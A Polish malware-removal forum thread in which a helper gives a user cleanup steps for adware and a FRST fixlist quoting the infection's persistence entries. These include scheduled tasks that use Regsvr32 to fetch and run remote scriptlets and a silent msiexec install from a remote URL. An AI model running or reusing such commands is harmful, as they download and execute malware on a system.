Norbi28 Opublikowano 2 Maja 2017 Zgłoś Udostępnij Opublikowano 2 Maja 2017 (edytowane) Witam, od niedawna mam problem z komputerem,przypuszczam ze jest to związane z programem yac another cleaner który mi się zainstalował,,nie mogę go niestety usunąć otwierają się co chwila inne strony z przegladarki,prośba o pomoc, w załączeniu logi frst Po pierwsze założyłeś temat na dwóch forach, czyli tu i na Pclab - (KLIK). To zagranie traktowane jest przez pomocników jako nie fair. Bo i ja mogłem stracić czas i Filutka78, która pomaga na Pclab analizując temat jednocześnie. Odpowiedziałem już tutaj, bo tu zauważyłem temat jako pierwszy. Rozumiem, że chcesz otrzymać pomoc szybko, ale pomocnicy robią to po pracy, po godzinach i nie jesteśmy w stanie zwiększyć tempa. Temat przetwarzam warunkowo. //Miszel03 FRST.txt Addition.txt Shortcut.txt gmer.txt Edytowane 2 Maja 2017 przez Miszel03 Dodaje notatkę moderacyjną do posta. Odnośnik do komentarza
Miszel03 Opublikowano 2 Maja 2017 Zgłoś Udostępnij Opublikowano 2 Maja 2017 System jest mocno zainfekowany przez programu typu adware / PUP. Tytułowy YAC jest widoczny i jeśli nie uda się go odinstalować normalnie to zrobi to automatycznie AdwCleaner. Ty prosisz mnie o pomoc, - ja Ci pomogę, ale proszę doceń nasze starania i przeczytaj o Portale z oprogramowaniem / Instalatory - na co uważać. 1. Przez panel sterowania odinstaluj: Wątpliwe skanery / fałszywe oprogramowanie: YAC(Yet Another Cleaner!)*. Przestarzałe i nieskuteczne już programy: Spybot - Search & Destroy. * - jeśli się nie powiedzie to proszę spróbować to zrobić z poziomu Trybu Awaryjnego (klik w klawisz F8 przed startem systemu). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {0BE84C32-6204-49DD-A2D5-16BD1766244E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81OThYF8QLRWw4FUZYRYM5NjExRWUxMTRYFdzSNkJXOF== scrobj.dll Task: {4394A7B2-212D-4BAB-A580-8DEA3DE21774} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () C:\Program Files (x86)\MIO Task: {A5242023-7278-4F8D-A264-CB9370714F70} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81OThYF8QLRWw4FUZYRYM5NjExRWUxMTRYFdzSNkJXOF== scrobj.dll ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk RemoveDirectory: C:\Program Files (x86)\Eastness RemoveDirectory: C:\Users\Norbert\AppData\Local\Eastness AlternateDataStreams: C:\ProgramData\Temp:07BF512B [129] FirewallRules: [{CDBB5FAE-B6D9-459C-94BA-C7556DAC703D}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-859463877-3988447155-127319224-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj81OThYF8QLRWw4FUZYRYM5NjExRWUxMTRYFdzSNkJXOF== /q HKU\S-1-5-21-859463877-3988447155-127319224-1000\...\Policies\Explorer: [NolowDiskSpaceChecks] 1 ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} HKU\S-1-5-21-859463877-3988447155-127319224-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ HKU\S-1-5-21-859463877-3988447155-127319224-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} SearchScopes: HKU\S-1-5-21-859463877-3988447155-127319224-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} SearchScopes: HKU\S-1-5-21-859463877-3988447155-127319224-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://startsear.ch/?aff=2&src=sp&cf=f612bbec-f919-11e1-bf52-0008caceadae&q={searchTerms} SearchScopes: HKU\S-1-5-21-859463877-3988447155-127319224-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} SearchScopes: HKU\S-1-5-21-859463877-3988447155-127319224-1000 -> {7DC5DCC1-3C36-4DC9-89E0-ABAEA354E1C3} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=U3&apn_dtid=OSJ000YYPL&apn_uid=60D452B4-09CD-4A8F-8AF9-187B1C1AF368&apn_sauid=CCFA6486-ADEA-4D51-9139-CF026C3432B5 BHO-x32: Brak nazwy -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> Brak pliku Toolbar: HKLM - Brak nazwy - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - Brak pliku S4 3DM; C:\Users\Norbert\AppData\Local\3DM\Kitty.dll [754688 2017-04-20] () [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\Norbert\AppData\Roaming\WinSAPSvc\WinSAP.dll [513536 2017-05-02] (win) [brak podpisu cyfrowego] S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] R2 SNARE; C:\Users\Norbert\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] U3 DfSdkS; Brak ImagePath C:\Users\Public\Desktop\ASUS\Entertainment\Game Park Console.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt (raport wynikowy). 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Zastosuj AdwCleaner najpierw z opcji Skanuj, a następnie z opcji Oczyść. Dostarcz raport z tego działania. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
Norbi28 Opublikowano 2 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 2 Maja 2017 (edytowane) Witam, w załaczeniu pliki po wykonaniu powyższych czynności AdwCleanerC1.txt AdwCleanerC2.txt Addition.txt Fixlog.txt FRST.txt Shortcut.txt Edytowane 2 Maja 2017 przez Rucek Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się